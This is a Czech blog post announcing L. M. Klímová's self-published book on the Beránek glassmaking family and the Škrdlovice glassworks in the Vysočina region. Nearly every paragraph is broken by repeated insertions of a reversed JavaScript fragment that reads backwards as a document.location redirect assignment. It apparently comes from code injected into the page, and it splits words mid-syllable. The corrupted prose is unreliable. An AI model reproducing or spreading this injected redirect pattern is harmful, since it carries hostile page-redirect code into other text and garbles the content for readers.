kluci Beránkovi
Rainbow page separator

KLUCI BERÁNKOVI

Neděle, 18. ledna 2015

Něco z his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie rodu Beránků a sklárny ve Škrdlovicích aneb ještě donedávna: Škrdlovice = sklárna = Beránci.

Kdokoli se alespoň trochu zajímá o regionální his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii Žďárska, je určitě potěšen vzrůstajícím počtem publikací, z nichž se dozvídáme, odkud se vzali, jak žili a co dokázali naši předkové v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to drsně krásném koutě Vysočiny.

Kluci Beránkovi

Kluci Beránkovi – L. M. Klímová

Z řady těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to knih se do značné míry vymyká práce L. M. Klímové ze Škrdlovic, která se objeví v prodeji na začátku února 2015 a která popisuje his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii sklářské rodiny Beránkových od konce 19. s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí až po současnost a hlavně pak jejich „dítěte“, sklárny ve Škrdlovicích. Au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka věnovala sběru informací a naslouchání pamětníkům tři roky.

Výsledek [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úsilí určitě není přesný fak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografický popis událostí, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože mnohé věci už prostě zpětně ověřit nelze a mnoho je jich už jenom v paměti a vzpomínkách stárnoucích účastníků; je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to však barvité, někdy humorné, někdy napínavé vyprávění o his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii jedné rozvětvené rodiny, jejíž osudy zásadně poznamenaly obě svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové války, únorový převrat i rok 1968.

Celý příběh je popisován střízlivým, věcným jazykem bez příkras, jenž je však znamenitě kolorován hojnými citacemi vzpomínek aktérů, mnohdy i přímo v huťáckém slangu.

               Jan Beránek a Rudolf Beránek

Jan Beránek a Rudolf Beránek

(Víte,co je šajbálka, heftajzna nebo truml? Seděli jste někdy na panglu?) Nad lokální úroveň pozdvihuje ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příběh ústřední postava rodiny, Emanuel Beránek. Ten, uhranut ještě coby dítě prvním pohledem na žhavou sklovinu v dnes již zaniklé herálecké huti , zůstal pak sklářské píšťale věrný po celý život a tu umanu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost přenesl i na celou rodinu, jakož i nemálo druhů kolem sebe. On, jeho bratři a jejich synové pak učili Evropu i Ameriku vyslovovat s respektem ta zvláštní neznámá jména – Škrdlovice a Beránek.

L. M. Klímová vydává svoji prvotinu vlastním nákladem, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to z důvodu finanční náročnosti a obtížně předvídatelného zájmu čtenářů není kniha zatím volně ke koupi. A i když se zcela určitě objeví na pultech místních knihkupců, doporučujeme učinit objednávku přímo u au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torky na mailové adrese lenka713@seznam.cz.

Jaroslav Beránek